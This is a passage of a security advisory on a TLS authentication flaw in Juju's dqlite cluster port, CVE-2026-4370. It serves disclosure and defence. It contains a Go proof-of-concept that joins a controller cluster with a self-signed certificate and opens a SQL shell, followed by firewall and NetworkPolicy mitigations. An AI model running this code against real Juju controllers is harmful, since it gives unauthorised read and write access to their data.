semicolon.\n\t\tstmt := strings.TrimSpace(buf.String())\n\t\tif strings.HasSuffix(stmt, \";\") {\n\t\t\tbuf.Reset()\n\t\t\tif currentDB == nil {\n\t\t\t\tfmt.Fprintln(os.Stderr, \"Error: no database open. Use .switch \u003cdatabase\u003e to open one.\")\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif err := execSQL(currentDB, stmt); err != nil {\n\t\t\t\tfmt.Fprintf(os.Stderr, \"Error: %v\\n\", err)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}\n\n// execSQL dispatches to execQuery or execStatement based on the leading keyword.\nfunc execSQL(db *sql.DB, stmt string) error {\n\t// Trim the trailing semicolon just for the prefix check.\n\tupper := strings.ToUpper(strings.TrimSpace(strings.TrimSuffix(strings.TrimSpace(stmt), \";\")))\n\tswitch {\n\tcase strings.HasPrefix(upper, \"SELECT\"),\n\t\tstrings.HasPrefix(upper, \"WITH\"),\n\t\tstrings.HasPrefix(upper, \"PRAGMA\"),\n\t\tstrings.HasPrefix(upper, \"EXPLAIN\"):\n\t\treturn execQuery(db, stmt)\n\tdefault:\n\t\treturn execStatement(db, stmt)\n\t}\n}\n\n// execQuery runs a statement expected to return rows and prints them as a table.\nfunc execQuery(db *sql.DB, stmt string) error {\n\trows, err := db.Query(stmt)\n\tif err != nil {\n\t\treturn err\n\t}\n\tdefer rows.Close()\n\n\tcols, err := rows.Columns()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(cols) == 0 {\n\t\tfmt.Println(\"OK\")\n\t\treturn nil\n\t}\n\n\t// Initialise column widths from the header names.\n\twidths := make([]int, len(cols))\n\tfor i, c := range cols {\n\t\twidths[i] = len(c)\n\t}\n\n\t// Scan all rows into memory so we can compute column widths before printing.\n\tvals := make([]interface{}, len(cols))\n\tvalPtrs := make([]interface{}, len(cols))\n\tfor i := range vals {\n\t\tvalPtrs[i] = \u0026vals[i]\n\t}\n\n\tvar allRows [][]string\n\tfor rows.Next() {\n\t\tif err := rows.Scan(valPtrs...); err != nil {\n\t\t\treturn err\n\t\t}\n\t\trow := make([]string, len(cols))\n\t\tfor i, v := range vals {\n\t\t\tif v == nil {\n\t\t\t\trow[i] = \"NULL\"\n\t\t\t} else {\n\t\t\t\trow[i] = fmt.Sprintf(\"%v\", v)\n\t\t\t}\n\t\t\tif len(row[i]) \u003e widths[i] {\n\t\t\t\twidths[i] = len(row[i])\n\t\t\t}\n\t\t}\n\t\tallRows = append(allRows, row)\n\t}\n\tif err := rows.Err(); err != nil {\n\t\treturn err\n\t}\n\n\tprintRow(cols, widths)\n\tprintSeparator(widths)\n\tfor _, row := range allRows {\n\t\tprintRow(row, widths)\n\t}\n\tfmt.Printf(\"(%d row(s))\\n\", len(allRows))\n\treturn nil\n}\n\n// execStatement runs a non-SELECT statement and prints the rows-affected count.\nfunc execStatement(db *sql.DB, stmt string) error {\n\tresult, err := db.Exec(stmt)\n\tif err != nil {\n\t\treturn err\n\t}\n\taffected, err := result.RowsAffected()\n\tif err != nil {\n\t\tfmt.Println(\"OK\")\n\t\treturn nil\n\t}\n\tfmt.Printf(\"OK (%d row(s) affected)\\n\", affected)\n\treturn nil\n}\n\nfunc printRow(vals []string, widths []int) {\n\tparts := make([]string, len(vals))\n\tfor i, v := range vals {\n\t\tparts[i] = fmt.Sprintf(\"%-*s\", widths[i], v)\n\t}\n\tfmt.Println(strings.Join(parts, \" | \"))\n}\n\nfunc printSeparator(widths []int) {\n\tparts := make([]string, len(widths))\n\tfor i, w := range widths {\n\t\tparts[i] = strings.Repeat(\"-\", w)\n\t}\n\tfmt.Println(strings.Join(parts, \"-+-\"))\n}\n\nfunc main() {\n\tvar db string\n\tvar join *[]string\n\tvar dir string\n\tvar verbose bool\n\tvar dbName string\n\n\tcmd := \u0026cobra.Command{\n\t\tUse:   \"dqlite-demo\",\n\t\tShort: \"Interactive dqlite SQL REPL\",\n\t\tLong: `An interactive SQL REPL backed by a dqlite cluster node.\n\nType SQL statements terminated with a semicolon (;) to execute them.\nStatements can span multiple lines.\n\nMeta-commands:\n  .switch \u003cdatabase\u003e   Open (or switch to) a named database\n  .close               Close the current database connection\n  .exit                Exit the REPL\n\nComplete documentation is available at https://github.com/canonical/go-dqlite`,\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tnodeDir := filepath.Join(dir, db)\n\t\t\tif err := os.MkdirAll(nodeDir, 0755); err != nil {\n\t\t\t\treturn errors.Wrapf(err, \"can\u0027t create %s\", nodeDir)\n\t\t\t}\n\n\t\t\tlogFunc := func(l client.LogLevel, format string, a ...interface{}) {\n\t\t\t\tif !verbose {\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tlog.Printf(fmt.Sprintf(\"%s: %s: %s\\n\", db, l.String(), format), a...)\n\t\t\t}\n\n\t\t\tcart, err := generateSelfSignedCert()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\toptions := []app.Option{\n\t\t\t\tapp.WithAddress(db),\n\t\t\t\tapp.WithCluster(*join),\n\t\t\t\tapp.WithLogFunc(logFunc),\n\t\t\t\tapp.WithTLS(\u0026tls.Config{\n\t\t\t\t\tInsecureSkipVerify: true,\n\t\t\t\t\tClientCAs:          x509.NewCertPool(),\n\t\t\t\t\tCertificates:       []tls.Certificate{cart},\n\t\t\t\t}, \u0026tls.Config{\n\t\t\t\t\tInsecureSkipVerify: true,\n\t\t\t\t}),\n\t\t\t}\n\n\t\t\tdqliteApp, err := app.New(nodeDir, options...)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tdefer func() {\n\t\t\t\tdqliteApp.Handover(context.Background())\n\t\t\t\tdqliteApp.Close()\n\t\t\t}()\n\n\t\t\tif err := dqliteApp.Ready(context.Background()); err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tline := liner.NewLiner()\n\t\t\tline.SetCtrlCAborts(true)\n\t\t\tdefer line.Close()\n\n\t\t\t// Forward termination signals by closing the liner, which causes\n\t\t\t// Prompt() to return and the REPL loop to exit cleanly.\n\t\t\tsigCh := make(chan os.Signal, 32)\n\t\t\tsignal.Notify(sigCh, unix.SIGPWR, unix.SIGQUIT, unix.SIGTERM)\n\t\t\tgo func() {\n\t\t\t\t\u003c-sigCh\n\t\t\t\tline.Close()\n\t\t\t}()\n\n\t\t\treturn runREPL(context.Background(), dqliteApp, dbName, line)\n\t\t},\n\t}\n\n\tflags := cmd.Flags()\n\tflags.StringVarP(\u0026db, \"db\", \"d\", \"\", \"address used for internal database replication\")\n\tjoin = flags.StringSliceP(\"join\", \"j\", nil, \"database addresses of existing nodes\")\n\tflags.StringVarP(\u0026dir, \"dir\", \"D\", \"/tmp/dqlite-demo\", \"data directory\")\n\tflags.BoolVarP(\u0026verbose, \"verbose\", \"v\", false, \"verbose logging\")\n\tflags.StringVarP(\u0026dbName, \"name\", \"n\", \"controller\", \"initial database name to open on startup\")\n\n\tcmd.MarkFlagRequired(\"db\")\n\n\tif err := cmd.Execute(); err != nil {\n\t\tos.Exit(1)\n\t}\n}\n```\n## Mitigation\n\nThe strongest protection is to apply the security updates. The following mitigations have also been explored. If security updates cannot be applied, you should only apply the following steps as a last resort and restore the original configuration file once updates are applied. Please note that modifying configuration files may stop future unattended upgrades from completing successfully, until these are reverted to the original content.\n\nOption 1: Disable the HA (High Availability) controller. If your environment does not strictly require HA, reducing the cluster to a single controller removes the need for DQlite replication. Moreover, the port that replicates the vulnerability should be blocked, namely 17666.\nOption 2: Restrict what IPs can communicate with port 17666, by implementing firewall rules to block all ingress traffic to this port. Only Juju controller IPs should be able to connect to this port.\n\nTo restrict access to the DQlite port to just the set of controller IPs, here\u0027s an example using ufw for a machine controller. This needs to be run on each controller. If the controller nodes change configuration, the rules will need to be updated accordingly.\nYou will need to enable access to the controller API port 17070 in accordance with your requirements for allowing clients to connect to the Juju controllers.\n\n```\n# Retrict access to the Dqlite port.\nsudo ufw allow from \u003ccontrollerip1\u003e to any port 17666 proto tcp\nsudo ufw allow from \u003ccontrollerip2\u003e to any port 17666 proto tcp\nsudo ufw allow from \u003ccontrollerip3\u003e to any port 17666 proto tcp\nsudo ufw deny 17666/tcp\n# Similarly, the mongo db port needs to allow controller access.\nsudo ufw allow from \u003ccontrollerip1\u003e to any port 37017 proto tcp\nsudo ufw allow from \u003ccontrollerip2\u003e to any port 37017 proto tcp\nsudo ufw allow from \u003ccontrollerip3\u003e to any port 37017 proto tcp\nsudo ufw deny 37017/tcp\n# Allow access to the controller API port.\nsudo ufw allow from \u003cyour cidr goes here\u003e to any port 17070 proto tcp\n# Allow access to the controller SSH port.\nsudo ufw allow from \u003cyour cidr goes here\u003e to any port 22 proto tcp\n# Ensure the firewall is enabled.\nsudo ufw enable\n# Check that the rules have been added correctly.\nsudo ufw status\n```\n\nFor Kubernetes controllers, HA is not supported. We recommend blocking access to port 17666. One way is to apply a network policy:\n\n```\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n  name: controller-0-17666-only-itself\n  namespace: \u003cyour controller namespace goes here\u003e\nspec:\n  podSelector:\n    matchLabels:\n      app: controller\n      statefulset.kubernetes.io/pod-name: controller-0\n  policyTypes:\n    - Ingress\n  ingress:\n    - from:\n        - podSelector:\n            matchLabels:\n              app: controller\n              statefulset.kubernetes.io/pod-name: controller-0\n      ports:\n        - protocol: TCP\n          port: 17666\n```",
  "id": "GHSA-gvrj-cjch-728p",
  "modified": "2026-04-08T11:57:35Z",
  "published": "2026-04-02T00:03:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/juju/juju/security/advisories/GHSA-gvrj-cjch-728p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4370"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/juju/juju"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Juju has Improper TLS Client/Server authentication and certificate verification on Database Cluster"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…